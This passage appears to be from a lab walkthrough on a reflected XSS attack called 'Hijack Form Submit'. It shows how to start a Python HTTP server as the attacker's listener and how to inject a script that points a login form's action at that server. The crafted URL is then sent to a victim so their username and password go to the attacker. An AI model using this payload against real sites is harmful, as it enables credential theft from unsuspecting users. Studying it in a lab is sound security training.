Task 3: Hijack Form Submit | Task Link
python -m http.server // for Python 3.X python -m SimpleHTTPServer // for Python 2.X
Now Attacker machine is ready to handle the request from the target site.
<script> document.forms.action="http://localhost:8000/" </script>
Copy and URL-encode the code provided above and paste it after the URL parameter in the address bar. This code will only change the action of the form, then send the URL to the victim and when victim enters the username and password and submit the form, it will be redirected to the attacker’s site. Further, you can run the PHP script on your server which will redirect the victim again to the requested URL. Following is the screenshot after victim made request.